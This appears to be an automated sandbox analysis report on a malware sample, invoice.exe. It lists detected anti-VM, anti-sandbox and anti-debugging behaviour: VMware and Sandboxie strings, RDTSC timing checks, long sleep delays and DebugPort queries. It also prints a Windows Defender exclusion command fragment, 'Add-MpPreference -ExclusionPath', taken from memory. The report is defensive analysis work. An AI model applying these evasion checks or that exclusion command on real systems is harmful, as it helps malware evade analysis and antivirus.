          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: invoice.exe PID: 1972, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\invoice.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\invoice.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exeRDTSC instruction interceptor: First address: 00000000021B85F4 second address: 00000000021B85FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exeRDTSC instruction interceptor: First address: 00000000021B898E second address: 00000000021B8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\invoice.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\invoice.exe TID: 4228Thread sleep time: -99765s >= -30000s
          Source: C:\Users\user\Desktop\invoice.exe TID: 2244Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6412Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\SysWOW64\wscript.exe TID: 6336Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wscript.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wscript.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\invoice.exeThread delayed: delay time: 99765
          Source: C:\Users\user\Desktop\invoice.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000004.00000000.269061528.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000004.00000000.268510649.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.251045811.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000004.00000000.246647210.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000004.00000000.269121644.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000004.00000000.260341050.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000004.00000000.268510649.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.268510649.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.269121644.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000004.00000000.268510649.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\invoice.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\invoice.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wscript.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_00409B30 LdrLoadDll,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0468746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0469A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0469BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0473740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0473740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0473740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_047214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04738CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0467849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0468C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0468C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04687D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04738D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0472E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04694D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04694D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04694D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0466AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046EA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04718DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0467D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0467D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0472FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0472FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0472FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0472FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04691DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04691DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04691DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_047305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_047305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04692581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04692581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04692581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04692581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04662D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04662D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04662D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04662D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04662D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0469FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0469FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0467766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0468AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0468AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0468AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0468AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0468AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04677E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04677E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04677E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04677E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04677E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04677E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0472AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0472AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0466E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0471FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0466C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0466C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0466C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04698E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0469A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0469A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04721608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04738ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0471FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04730EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04730EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04730EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046FFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0467FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04738F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0467EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04664F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04664F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0469E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0469A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0469A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0473070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0473070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0468F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04678794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04722073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04731074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04680050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04680050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0469002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0469002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0469002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0469002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0469002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0467B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0467B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0467B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0467B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04734015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04734015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046658EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046FB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0469F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0469F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0469F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04669080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0466C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0466B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0466B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0468B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0468B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04684120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04684120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04684120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04684120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04684120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0469513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0469513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04669100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04669100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04669100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046F41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0466B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0466B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0466B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046961A0 mov eax, dword ptr fs:[00000030h]
